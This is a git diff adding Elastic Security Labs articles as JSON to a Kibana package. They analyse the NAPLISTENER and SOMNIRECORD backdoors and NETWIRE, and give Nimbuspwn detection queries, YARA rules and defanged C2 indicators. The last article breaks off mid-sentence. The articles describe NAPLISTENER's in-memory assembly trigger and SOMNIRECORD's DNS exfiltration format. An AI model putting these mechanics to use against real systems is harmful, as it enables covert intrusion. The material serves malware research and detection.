diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-naplistener_more_bad_dreams_from_the_developers_of_siestagraph-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-naplistener_more_bad_dreams_from_the_developers_of_siestagraph-md.json
new file mode 100644
index 00000000000..9110259f113
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-naplistener_more_bad_dreams_from_the_developers_of_siestagraph-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"NAPLISTENER: more bad dreams from developers of SIESTAGRAPH\"\nslug: \"naplistener-more-bad-dreams-from-the-developers-of-siestagraph\"\ndate: \"2023-06-27\"\ndescription: \"Elastic Security Labs observes that the threat behind SIESTAGRAPH has shifted priorities from data theft to persistent access, deploying new malware like NAPLISTENER to evade detection.\"\nauthor:\n - slug: remco-sprooten\nimage: \"blog-thumb-filtered-lens.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - malware analysis\n - naplisitener\n - siestagraph\n---\n\n### Introduction\n\nWhile continuing to monitor the [REF2924](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) activity group, Elastic Security Labs observed that the attacker shifted priorities from data theft to persistent access using several mechanisms. On January 20, 2023, a new executable `Wmdtc.exe` was created and installed as a Windows Service using a naming convention similar to the legitimate binary used by the Microsoft Distributed Transaction Coordinator service ( `Msdtc.exe` ).\n\n`Wmdtc.exe` is an HTTP listener written in C#, which we refer to as NAPLISTENER. Consistent with SIESTAGRAPH and other malware families developed or used by this threat, NAPLISTENER appears designed to evade network-based forms of detection. _Notably, network- and log-based detection methods are common in the regions where this threat is primarily active (southern and southeastern asia)._\n\n### Analysis\n\nThis unique malware sample contains a C# class called `MsEXGHealthd` that consists of three methods: `Main` , `SetRespHeader` , and `Listener`. This class establishes an HTTP request listener that can process incoming requests from the Internet, and respond accordingly by filtering malware commands and transparently passing along legitimate web traffic. This class is depicted in the following image:\n\n\n\n### Malware analysis\n\nThe `Main` method is invoked when the program runs and creates a thread object, which will be used by the `Listener` method. The thread is then put to sleep for 0 milliseconds, and then started. Implementing a sleep capability is consistent with SIESTAGRAPH, NAPLISTENER, and other malware developed or used by this group.\n\nThe `SetRespHeader` method sets the response headers for the HTTP response. It takes an `HttpListenerResponse` object as a parameter and defines headers such as `Server` , `Content-Type` , and `X-Powered-By`. In one aggressively-targeted victim environment, the IIS web server returns a 404 response with a `Server` header containing `Microsoft-IIS/10.0` as seen below, unless specific parameters are present:\n\n\n\nHowever, the 404 error when requesting the listener URI adds `Content-Type: text/html; charset=utf-8` as an extra header. When NAPLISTENER is installed, the string `Microsoft-HTTPAPI/2.0` is appended to the Server header. This behavior makes the listener detectable and does not generate a 404 error. It is likely this filtering methodology was chosen to avoid discovery by web scanners and similar technologies.\n\nDefenders may instinctively search for these errors in IIS web server logs, but the NAPLISTENER implant functions inline and Windows will redirect these requests to the registered application, allowing the malware to ensure those errors never reach the web server logs where analysts may see them. Additionally, security tools that ingest web server logs will not have an opportunity to identify these behaviors.\n\n\n\nThe `Listener` method is where most of the work happens for NAPLISTENER.\n\nFirst, this method creates an `HttpListener` object to handle incoming requests. If `HttpListener` is supported on the platform being used (which it should be), it adds a prefix to the listener and starts it.\n\nOnce running, it waits for incoming requests. When a request comes in, it reads any data that was submitted (stored in a `Form` field), decodes it from Base64 format, and creates a new `HttpRequest` object with the decoded data. It creates an `HttpResponse` object and an `HttpContext` object, using these two objects as parameters. If the submitted Form field contains `sdafwe3rwe23` , it will try to create an assembly object and execute it using the `Run` method.\n\nThis means that any web request to `/ews/MsExgHealthCheckd/` that contains a base64-encoded .NET assembly in the `sdafwe3rwe23` parameter will be loaded and executed in memory. It's worth noting that the binary runs in a separate process and it is not associated with the running IIS server directly.\n\nIf that fails for some reason (e.g., invalid or missing data), then a \"404 Not Found\" response will be sent with an empty body instead . After either response has been sent, the stream is flushed and the connection closed before looping back to wait for more incoming requests.\n\n### Proof-of-concept prerequisites\n\n_Attention: Please remember that this is meant as a proof-of-concept to illustrate how NAPLISTENER must be prepared for a target environment: it should not be deployed in production environments for any reason._\n\nIn order to properly run NAPLISTENER, an SSL certificate must be generated and the application registered to use it on a target endpoint. A general example of generating a self-signed certificate resembles the following commands:\n\n\n\nThe adversary needs to then Import the `certificate.pfx` object into the windows certificate store, as depicted in the following image:\n\n\n\nEach certificate contains a thumbprint, and the following screen capture depicts an example certificate:\n\n\n\nThe thumbprint value is necessary to register the application as seen in the following command:\n\n\n\nThe adversary needs to replace the `certhash` value with the thumbprint from their certificate. The `appid` is the GUID of the sample application ID. Once the environment is properly configured, the sample can be run from any privileged terminal.\n\nThe following python script created by Elastic Security Labs demonstrates one method that can then be used to trigger NAPLISTENER. The payload in this example is truncated for readability, and may be released at a later time when the industry has better ability to detect this methodology.\n\n\n\nIn our PoC, running the python script results in a harmless instance of `calc.exe`.\n\n\n\n### Resources\n\nElastic Security Labs has published a NAPLISTENER signature to the open protections artifact repository [here](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_NapListener.yar).\n\n### Sources\n\nCode similarity analyses are an important part of our process. During our investigation of NAPLISTENER, we identified a public [GitHub repository](https://github.com/A-D-Team/SharpMemshell/blob/main/HttpListener/memshell.cs) that contains a similar project. Similar logic and identical debugging strings are present in both pieces of code, and we assess that `SharpMemshell` may have inspired the threat responsible for NAPLISTENER.\n\n### Key takeaways\n\n- The attacker has shifted their focus from data theft to establishing persistent access using new malware including NAPLISTENER, an HTTP listener written in C#\n- NAPLISTENER creates an HTTP request listener that can process incoming requests from the internet, reads any data that was submitted, decodes it from Base64 format, and executes it in memory\n- NAPLISTENER is designed to evade network-based detection methods by behaving similarly to web servers\n- The attacker relies on code present in public repositories for a variety of purposes, and may be developing additional prototypes and production-quality code from open sources\n"
+ },
+ "title": "NAPLISTENER: more bad dreams from developers of SIESTAGRAPH",
+ "slug": "naplistener-more-bad-dreams-from-the-developers-of-siestagraph",
+ "date": "2023-06-27",
+ "description": "Elastic Security Labs observes that the threat behind SIESTAGRAPH has shifted priorities from data theft to persistent access, deploying new malware like NAPLISTENER to evade detection.",
+ "author": [
+ {
+ "slug": "remco-sprooten"
+ }
+ ],
+ "image": "blog-thumb-filtered-lens.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "malware analysis",
+ "naplisitener",
+ "siestagraph"
+ ]
+ },
+ "id": "security_labs_content-naplistener_more_bad_dreams_from_the_developers_of_siestagraph-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_configuration_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_configuration_extractor-md.json
new file mode 100644
index 00000000000..d804ccc82e5
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_configuration_extractor-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"NETWIRE Configuration Extractor\"\nslug: \"netwire-configuration-extractor\"\ndate: \"2023-01-27\"\nsubtitle: \"Configuration extraction tool for the NETWIRE malware.\"\ndescription: \"Python script to extract the configuration from NETWIRE samples.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - netwire\n - ref9965\n---\n\nPython script to extract the payload from NETWIRE samples.\n\n[Download netwire-configuration-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdcef1d05d2077d05/63d43627c31a7126813ff8b6/netwire-configuration-extractor.tar.gz)\n\n> For information on the NETWIRE malware check out the following resources:\n>\n> - [NETWIRE Dynamic Configuration Extraction](https://www.elastic.co/security-labs/netwire-dynamic-configuration-extraction)\n\n## Getting started\n\n### Docker\n\nThe recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.\n\n```\ndocker build . -t netwire_loader_config_extractor\n```\n\nThen we run the container with the **-v** flag to map a host directory to the docker container directory.\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data netwire_loader_config_extractor:latest --help\n```\n\n### Running it locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\nnetwire-config-extractor --help\n```\n\n## Usage\n\nAll samples need to be unpacked prior to execution extraction attempts.\n\nOur extractor takes either a directory of samples with **-d** option or **-f** for a single sample and then can output parts of the configuration of note, specifically:\n\n- **-k** : extract the encryption keys\n- **-c** : extract the C2 information\n- **-s** : extract the wide-character strings\n- **-a** : extract the ASCII character strings\n\n```\ndocker run -ti --rm -v $(pwd)/data:/data netwire_loader_config_extractor:latest -d \"C:\\tmp\\samples\"\n```\n\n\n\nYou can collect the extracted configurations from the directory you set when running the extractor.\n"
+ },
+ "title": "NETWIRE Configuration Extractor",
+ "slug": "netwire-configuration-extractor",
+ "subtitle": "Configuration extraction tool for the NETWIRE malware.",
+ "date": "2023-01-27",
+ "description": "Python script to extract the configuration from NETWIRE samples.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "netwire",
+ "ref9965"
+ ]
+ },
+ "id": "security_labs_content-netwire_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_dynamic_configuration_extraction-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_dynamic_configuration_extraction-md.json
new file mode 100644
index 00000000000..0661216d05f
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-netwire_dynamic_configuration_extraction-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"NETWIRE Dynamic Configuration Extraction\"\nslug: \"netwire-dynamic-configuration-extraction\"\ndate: \"2023-01-30\"\nsubtitle: \"A tool for the dynamic extraction of NETWIRE configurations based on emulation.\"\ndescription: \"Elastic Security Labs discusses the NETWIRE trojan and is releasing a tool to dynamically extract configuration files.\"\nauthor:\n - slug: seth-goodwin\n - slug: salim-bitam\nimage: \"lock-code-combination-configuration.jpg\"\ncategory:\n - slug: security-research\ntags:\n - netwire\n - ref9965\n---\n\n## Key takeaways\n\n- NETWIRE has shown an increase in prevalence over the last year\n- Elastic Security Labs created an extractor to pull out configuration data from NETWIRE files and memory dumps targeting the functions the malware uses to extract its encrypted data\n- The NETWIRE extractor is freely available for download\n\n> To download the NETWIRE configuration extractor, check out our post on the tool:\n>\n> - [NETWIRE configuration extractor](https://www.elastic.co/security-labs/netwire-configuration-extractor)\n\n## Preamble\n\n[NETWIRE](https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire) is a Remote Access Tool (RAT) that has been used since at least 2014. It is a publicly available commodity malware and has been observed being used by financially motivated and nation-state actors.\n\n\n\nIn the second half of 2022, we noticed an uptick in the prevalence of NETWIRE usage in our telemetry data. This prompted the Elastic Security Labs team to develop a configuration extractor to assist the security community in collecting atomic indicators within the configurations. Using this extractor will support threat tracking and improve detection, prevention, and response times.\n\n## Extractor\n\nThe NETWIRE RAT uses the [RC4 symmetric encryption](https://en.wikipedia.org/wiki/RC4) algorithm to protect its configuration which is encrypted in the **.data** section along with the 16 bytes long RC4 decryption key.\n\nWhile reversing our samples the analysts noticed that for both the **crypto::rc4_init_sbox** and **crypto::rc4_decrypt** functions the second argument (#2 in the image below) is always a memory address for the desired encrypted configuration value, and the third argument (#3) is an immediate value written to the memory stack before the call which represents the size of the encrypted string.\n\nIt was also noted that the function calls are one after the other. This is important to allow us to structure the extractor to look for these functions sequentially.\n\n\n\nWith **$key** (from the above image) in mind, we created YARA rules to identify the location of the key and encrypted configuration values.\n\n to:\n\n1. Locate the function responsible for decrypting the configuration using YARA.\n2. Disassemble the function using Capstone.\n\n3. Extract the RC4 key address and the encrypted configuration field addresses.\n4. Extract the size of the configuration field.\n5. RC4 decrypt the encrypted fields and rebuild the configuration.\n\n\n\n registry key to achieve persistence.\n- **C2 IP list** : List of command and control (C2) server domains or IP addresses.\n- **Host ID** : A unique identifier that is assigned to the infected machine.\n- **Installation path** : The location where the malware will be installed.\n- **Keylogger logs directory** : The location where the keylogging log file will be stored.\n- **Mutex** : Mutex name, to create a synchronization object to ensure only one instance of the sample is running on the machine.\n- **Password** : Static password to generate AES key used for encrypting the communication between the malware and the C2 server.\n- **Run registry key entry** : Name of the entry in the [run registry](https://attack.mitre.org/techniques/T1547/001/), used for persistence.\n- **Sleep in seconds** : The amount of time the malware sleeps.\n\n\n\nThe configuration extractor accepts four parameters:\n\n- **-f** : to specify a single NETWIRE sample\n- **-d** : To specify a directory of NETWIRE samples\n- **-o** : To write the configuration in JSON format to the specified file\n- **--all-config** : To print the unparsed raw decrypted configuration\n\n## Analysis\n\nWe’ve used this extractor to examine a set of samples from the previous 180 days to extract indicators for further enrichment and analysis.\n\nOur initially collected batch of samples came as a mixture of executable files and memory dumps. The extractor will only work on unmapped files, so the dumps which were already mapped were run through [**pe_unmapper**](https://github.com/hasherezade/pe_unmapper).\n\nWhen extracting a payload from memory, we are obtaining a memory-mapped version of it. This means that the **\"Raw Address\"** and **\"Raw Size\"** may not be correctly aligned with the correct section’s data. To correctly align the PE file, it is necessary to adjust the pointer to the raw address so that it matches the virtual address for every section.\n\nNow we can run the configuration extractor with [Poetry](https://python-poetry.org/) against our directory of unmapped binaries:\n\n```\n**poetry lock**\n**poetry install**\n**poetry shell**\n**netwire-config-extractor -d sample-dir/ -o output.ndjson**\n```\n\nThis file, **output.ndjson** , can then be uploaded to Kibana for further analysis.\n\n> Check out the [Elastic Container project](https://www.elastic.co/security-labs/the-elastic-container-project) to quick spin up an Elastic Stack and start analyzing structured security-relevant data.\n\n\n\nNext time you run into a NETWIRE sample, run it through our configuration extractor to pull out other indicators to help you on your analytic journey or begin remediating quicker.\n\n## Detection\n\n### YARA\n\nThese YARA rules can used to detect and identify NETWIRE RAT.\n\n```\nrule Windows_Trojan_Netwire_1 {\n meta:\n author = \"Elastic Security\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Netwire\"\n threat_name = \"Windows.Trojan.Netwire\"\n strings:\n $a = { 0F B6 74 0C 10 89 CF 29 C7 F7 C6 DF 00 00 00 74 09 41 89 F3 88 5C }\n condition:\n all of them\n}\nrule Windows_Trojan_Netwire_2 {\n meta:\n author = \"Elastic Security\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Netwire\"\n threat_name = \"Windows.Trojan.Netwire\"\n strings:\n $a1 = \"[%.2d/%.2d/%d %.2d:%.2d:%.2d]\" fullword\n $a2 = \"\\\\Login Data\"\n $a3 = \"SOFTWARE\\\\NetWire\" fullword\n condition:\n 2 of them\n}\nrule Windows_Trojan_Netwire_3 {\n meta:\n author = \"Elastic Security\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Netwire\"\n threat_name = \"Windows.Trojan.Netwire\"\n strings:\n $a = { C9 0F 44 C8 D0 EB 8A 44 24 12 0F B7 C9 75 D1 32 C0 B3 01 8B CE 88 44 }\n condition:\n all of them\n}\nrule Windows_Trojan_Netwire_4 {\n meta:\n author = \"Elastic Security\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Netwire\"\n threat_name = \"Windows.Trojan.Netwire\"\n strings:\n $a1 = \"http://%s%ComSpec\" ascii fullword\n $a2 = \"%c%.8x%s\" ascii fullword\n $a3 = \"%6\\\\6Z65dlNh\\\\YlS.dfd\" ascii fullword\n $a4 = \"GET %s HTTP/1.1\" ascii fullword\n $a5 = \"R-W65: %6:%S\" ascii fullword\n $a6 = \"PTLLjPq %6:%S -qq9/G.y\" ascii fullword\n condition:\n 4 of them\n}\n```\n\n## Indicators\n\nAll indicators are also available [for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte3d9f2700cdf6637/63d3f854e4e29e75dc5de351/9965-indicators.zip) in both ECS and STIX format in a combined zip bundle.\n\nThe following indicators were discussed in this research.\n\n| Indicator | Type | Note |\n| -------------------------------------- | ----------- | -------------- |\n| 139.28.38[.]235 | ipv4-addr | NETWIRE RAT C2 |\n| 149.102.132[.]253 | ipv4-addr | NETWIRE RAT C2 |\n| 184.75.221[.]115 | ipv4-addr | NETWIRE RAT C2 |\n| 185.136.165[.]182 | ipv4-addr | NETWIRE RAT C2 |\n| 185.140.53[.]139 | ipv4-addr | NETWIRE RAT C2 |\n| 185.140.53[.]144 | ipv4-addr | NETWIRE RAT C2 |\n| 185.140.53[.]154 | ipv4-addr | NETWIRE RAT C2 |\n| 185.140.53[.]61 | ipv4-addr | NETWIRE RAT C2 |\n| 185.216.71[.]251 | ipv4-addr | NETWIRE RAT C2 |\n| 194.36.111[.]59 | ipv4-addr | NETWIRE RAT C2 |\n| 194.5.98[.]126 | ipv4-addr | NETWIRE RAT C2 |\n| 194.5.98[.]178 | ipv4-addr | NETWIRE RAT C2 |\n| 194.5.98[.]188 | ipv4-addr | NETWIRE RAT C2 |\n| 194.5.98[.]65 | ipv4-addr | NETWIRE RAT C2 |\n| 212.193.29[.]37 | ipv4-addr | NETWIRE RAT C2 |\n| 212.193.30[.]230 | ipv4-addr | NETWIRE RAT C2 |\n| 213.152.161[.]249 | ipv4-addr | NETWIRE RAT C2 |\n| 217.151.98[.]163 | ipv4-addr | NETWIRE RAT C2 |\n| 23.105.131[.]166 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]199 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]203 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]206 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]208 | ipv4-addr | NETWIRE RAT C2 |\n| 37.0.14[.]214 | ipv4-addr | NETWIRE RAT C2 |\n| 37.120.217[.]243 | ipv4-addr | NETWIRE RAT C2 |\n| 51.161.104[.]138 | ipv4-addr | NETWIRE RAT C2 |\n| 54.145.6[.]146 | ipv4-addr | NETWIRE RAT C2 |\n| 80.66.64[.]136 | ipv4-addr | NETWIRE RAT C2 |\n| 85.209.134[.]105 | ipv4-addr | NETWIRE RAT C2 |\n| 85.31.46[.]78 | ipv4-addr | NETWIRE RAT C2 |\n| 94.156.35[.]40 | ipv4-addr | NETWIRE RAT C2 |\n| 20220627.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| admin96.hopto[.]org | domain-name | NETWIRE RAT C2 |\n| alice2019.myftp[.]biz | domain-name | NETWIRE RAT C2 |\n| asorock1111.ddns[.]net | domain-name | NETWIRE RAT C2 |\n| banqueislamik.ddrive[.]online | domain-name | NETWIRE RAT C2 |\n| betterday.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| bigman2021.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| blazeblaze.ddns[.]net | domain-name | NETWIRE RAT C2 |\n| chongmei33.myddns[.]rocks | domain-name | NETWIRE RAT C2 |\n| clients.enigmasolutions[.]xyz | domain-name | NETWIRE RAT C2 |\n| gracedynu.gleeze[.]com | domain-name | NETWIRE RAT C2 |\n| ingobea.hopto[.]org | domain-name | NETWIRE RAT C2 |\n| iphanyi.edns[.]biz | domain-name | NETWIRE RAT C2 |\n| iphy.strangled[.]net | domain-name | NETWIRE RAT C2 |\n| kimlee11.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| loffgghh.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| megaton.gleeze[.]com | domain-name | NETWIRE RAT C2 |\n| moran101.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| netuwaya.servecounterstrike[.]com | domain-name | NETWIRE RAT C2 |\n| nowancenorly.ddns[.]net | domain-name | NETWIRE RAT C2 |\n| podzeye.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| podzeye2.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| recoveryonpoint.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| redlinea[.]top | domain-name | NETWIRE RAT C2 |\n| roller.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| rozayleekimishere.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| sani990.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| saturdaylivecheckthisout.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| uhie.hopto[.]org | domain-name | NETWIRE RAT C2 |\n| uhie2020.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| wcbradley.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| xman2.duckdns[.]org | domain-name | NETWIRE RAT C2 |\n| zonedx.ddns[.]net | domain-name | NETWIRE RAT C2 |\n"
+ },
+ "title": "NETWIRE Dynamic Configuration Extraction",
+ "slug": "netwire-dynamic-configuration-extraction",
+ "subtitle": "A tool for the dynamic extraction of NETWIRE configurations based on emulation.",
+ "date": "2023-01-30",
+ "description": "Elastic Security Labs discusses the NETWIRE trojan and is releasing a tool to dynamically extract configuration files.",
+ "author": [
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "lock-code-combination-configuration.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "netwire",
+ "ref9965"
+ ]
+ },
+ "id": "security_labs_content-netwire_dynamic_configuration_extraction-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation-md.json
new file mode 100644
index 00000000000..c599a6709d0
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Nimbuspwn: Leveraging vulnerabilities to exploit Linux via Privilege Escalation\"\nslug: \"nimbuspwn-leveraging-vulnerabilities-to-exploit-linux-via-privilege-escalation\"\ndate: \"2022-06-02\"\ndescription: \"Microsoft 365 Defender team released a post detailing several identified vulnerabilities. These vulnerabilities allow adversarial groups to escalate privileges on Linux systems, allowing for deployment of payloads, ransomware, or other attacks.\"\nauthor:\n - slug: jake-king\nimage: \"thumb-report-threat-hunting.png\"\ncategory:\n - slug: security-research\n---\n\n## Summary\n\nThe Microsoft 365 Defender team released a [post](https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/) detailing several identified vulnerabilities. These vulnerabilities allow adversarial groups to easily escalate privileges on Linux systems, allowing for deployment of payloads, ransomware, or other malicious actions. Collectively known as Nimbuspwn, these vulnerabilities include a series of security issues within networkd-dispatcher, specifically directory traversal, symlink race, and [TOCTU](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use) race conditions.\n\nDetails are covered in their [detailed post](https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/), and further information will be available within the two requested CVEs: [CVE-2022-29799](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29799) and [CVE-2022-29800](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29800). At the time of publication these CVE IDs are still reserved.\n\nWhile this class of vulnerability requires local shell access to exploit, it should be considered important for those that currently leverage networkd-dispatcher within their Linux workload environments. A patch by the creator has been implemented to resolve the issue under the guidance of Microsoft, and should be implemented by those that have systems impacted by this vulnerability.\n\n## Detecting Nimbuspwn activity within Elastic\n\nOur research team at Elastic has focused on building out a series of initial detections that leverage Elastic Security, alongside OSquery.\n\nFirstly, those wishing to understand what systems in their environment may be impacted need to determine systems that have networkd-dispatcher installed:\n\n\n\nWriting an OSquery search that returns the installed version of Networkd-Dispatcher is relatively trivial, and understanding the systems that may be at risk are returned at a glance. In the screenshot above, we can see an example host listed with a version number of 2.1-2, specific to Ubuntu. The version installed within your environment may be slightly different depending on the distribution. An example query has been provided below.\n\n```\nSelect version from deb_packages rpm_packages where name=’networkd-dispatcher’;\n```\n\nWe leveraged the initial research paper from Microsoft, determining a specific malicious pattern adversaries may use to exploit this vulnerability:\n\n\n\nThe Elastic Security team wrote an EQL Detection Rule to detect suspicious child processes of Networkd-Dispatcher. Any child-process detected by this rule should be considered highly suspicious given the circumstances, and should be investigated. Further analysis will likely be provided as our security community builds more POCs for this exploit. An example query appears below:\n\n```\nprocess where event.type == \"start\" and process.parent.name : \"networkd-dispatcher\" and not process.name in (\"networkctl\", \"networkd-dispatcher\")\n```\n\nGiven the nature of this exploit, we expect far greater diversity in POCs over the coming weeks. You can expect updates in the form of further signatures or rules accordingly.\n\n## Defensive recommendations\n\nOrganizations impacted by vulnerabilities discovered by the Microsoft team should follow guidance provided by Microsoft in their initial post, and update their instances of networkd-dispatcher. Elastic recommends investigating hosts that are found to be running vulnerable versions of network-dispatcher with the aforementioned detections for any sign of compromise.\n\nNot already using Elastic Security? You can always get started with a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.\n"
+ },
+ "title": "Nimbuspwn: Leveraging vulnerabilities to exploit Linux via Privilege Escalation",
+ "slug": "nimbuspwn-leveraging-vulnerabilities-to-exploit-linux-via-privilege-escalation",
+ "date": "2022-06-02",
+ "description": "Microsoft 365 Defender team released a post detailing several identified vulnerabilities. These vulnerabilities allow adversarial groups to escalate privileges on Linux systems, allowing for deployment of payloads, ransomware, or other attacks.",
+ "author": [
+ {
+ "slug": "jake-king"
+ }
+ ],
+ "image": "thumb-report-threat-hunting.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-nimbuspwn_leveraging_vulnerabilities_to_exploit_linux_via_privilege_escalation-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-not_sleeping_anymore_somnirecords_wakeup_call-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-not_sleeping_anymore_somnirecords_wakeup_call-md.json
new file mode 100644
index 00000000000..2d4553abd2f
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-not_sleeping_anymore_somnirecords_wakeup_call-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Not sleeping anymore: SOMNIRECORD's wake-up call\"\nslug: \"not-sleeping-anymore-somnirecords-wakeup-call\"\ndate: \"2023-03-22\"\ndescription: \"Elastic Security Labs researchers identified a new malware family written in C++ that we refer to as SOMNIRECORD. This malware functions as a backdoor and communicates with command and control (C2) while masquerading as DNS.\"\nauthor:\n - slug: salim-bitam\nimage: \"blog-thumb-steel-engine.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - malware analysis\n - somnirecord\n - siestagraph\n - naplistener\n---\n\n### Introduction\n\nWhile monitoring the [REF2924 activity group](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns), Elastic Security Labs researchers identified a new malware family written in C++ that we refer to as SOMNIRECORD. This malware functions as a backdoor and communicates with command and control (C2) while masquerading as DNS, allowing attackers to bypass network security controls such as firewalls and intrusion detection systems. Like [NAPLISTENER](https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph) and [SIESTAGRAPH](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry), these factors make it difficult to detect and block using strictly network-based technologies.\n\n### Analysis\n\nUpon execution, SOMNIRECORD first generates a random string of three characters used as a unique identifier for the running malware instance. It then probes a domain name that is hardcoded into the binary (\" `dafadfweer.top`\") by appending the random three-character string and the string \" `-PROBE`\" to the domain name. SOMNIRECORD simulates a DNS query to retrieve the number of commands that are queued for the backdoor to execute, each stored in a `TXT` record of the associated domain.\n\n\n\n\n\nAfter obtaining the number of commands waiting to be executed, the backdoor retrieves each command individually by sending a DNS query for a `TXT` record. The backdoor prepends the previously-generated random string to the \" `-CMD`\" string before sending the DNS query. This allows the backdoor to receive each command individually and execute them accordingly.\n\n\n\n### Command handling\n\nThe malware's command handling function is a critical component that enables it to execute commands received from the C2 server. This function processes the command and performs the appropriate action based on the command type. In this malware, there are five commands that the malware can execute: `SYS, PSL, sleep, ECM` , and `WS` :\n\n\n\n“ `SYS` ” is used to retrieve information about the infected machine. When this command is executed, the SOMNIRECORD payload collects information about the computer name, the number of processors, OEM ID, and processor type. This information can be used to fingerprint/identify specific infected machines.\n\n“ `PSL` ” is used to list all processes currently running on the infected machine by executing the system command “tasklist”.\n\n“ `ECM` ” allows the malware to execute any software already present on the system, such as cmd.exe.\n\n“ `sleep` ” is used to change the beacon interval to the c2 server.\n\n“ `WS` ” is used to deploy an ASPX-based webshell to a specified path. The ASPX is hardcoded into the malware itself.\n\nTo communicate command results to its C2 server, SOMNIRECORD employs a unique technique that involves encoding the output of executed commands as hex values, prepending the previously generated random string to the \" `-DATA`\" string and then appending the hex values. The malware then performs a DNS query to the subdomain, allowing the encoded command output to be transmitted to the C2 server for example: `XXX-DATA-68656c6c6f20776f726c64.dafadfweer.top`\n\n\n\n### Resources\n\nElastic Security Labs has provided a SOMNIRECORD signature in our open protections artifact repository 